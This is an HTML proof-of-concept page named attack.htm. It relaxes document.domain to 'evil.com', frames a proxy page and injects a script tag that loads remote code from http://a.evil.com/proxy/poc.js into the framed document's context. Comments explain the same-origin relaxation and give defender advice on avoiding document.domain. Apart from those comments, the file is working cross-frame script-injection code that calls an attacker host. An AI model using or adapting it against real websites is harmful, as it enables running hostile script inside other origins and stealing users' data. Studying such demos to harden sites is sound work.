attack.htm
35 lines (28 loc) · 797 Bytes
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
</head>
<body></body>
<script>
// Relax this document's origin to the parent domain "evil.com" (the demo's
// placeholder name). Cross-frame DOM access through document.domain requires
// both documents to opt in with the same value; the framed proxy.htm
// presumably does so as well (its source is not shown here).
// Defender note: the document.domain setter is deprecated. A page that sets
// it extends same-origin trust to every host under that domain, so prefer
// postMessage with explicit origin checks, and send
// `Origin-Agent-Cluster: ?1` to opt the page out of domain relaxation.
document.domain = "evil.com";
/**
 * Create a 300x300 iframe with id "proxy", point it at `src`, and append it
 * to this page's <body>.
 *
 * @param {string} src - URL loaded into the frame.
 * @param {Function} [onload] - Optional handler assigned to the frame's
 *   onload property before the frame is attached to the document.
 * @returns {HTMLIFrameElement} The newly created iframe element.
 */
function inj_iframe(src, onload) {
    var frame = document.createElement("iframe");
    frame.id = "proxy";
    frame.height = 300;
    frame.width = 300;
    frame.src = src;
    // Attach the handler before insertion so the load event is not missed.
    if (onload) {
        frame.onload = onload;
    }
    var pageBody = document.getElementsByTagName("body")[0];
    pageBody.appendChild(frame);
    return frame;
}
/**
 * Load handler for the "proxy" iframe: reach into the framed document and
 * append a <script> element to its <head>.
 *
 * The cross-frame document access only succeeds when the browser treats both
 * documents as same-origin. This page sets document.domain to "evil.com" at
 * the top of the script; the framed page presumably sets the same value (not
 * visible here). What the demo shows for defenders: a page that relaxes
 * document.domain to a parent domain lets any document on a sibling host that
 * does the same read and modify its DOM, including adding script that then
 * runs in the framed page's context. Avoid setting document.domain and use
 * postMessage with origin checks for cross-subdomain communication.
 */
function inject() {
    var frame = document.getElementById("proxy");
    // contentDocument is the standard accessor; contentWindow.document is the
    // fallback the original kept for older browsers.
    var framedDoc = frame.contentDocument || frame.contentWindow.document;
    var tag = framedDoc.createElement("SCRIPT");
    tag.src = "http://a.evil.com/proxy/poc.js";
    // Kept from the original; scripts inserted through DOM APIs load
    // asynchronously, so defer is not expected to change when this runs.
    tag.defer = true;
    var framedHead = framedDoc.getElementsByTagName("HEAD")[0];
    framedHead.appendChild(tag);
}
// Entry point: frame the page hosted on the parent domain and run inject()
// once that frame fires its load event. `o` keeps a reference to the iframe.
var o = inj_iframe("http://evil.com/proxy/proxy.htm", inject);
</script>
</html>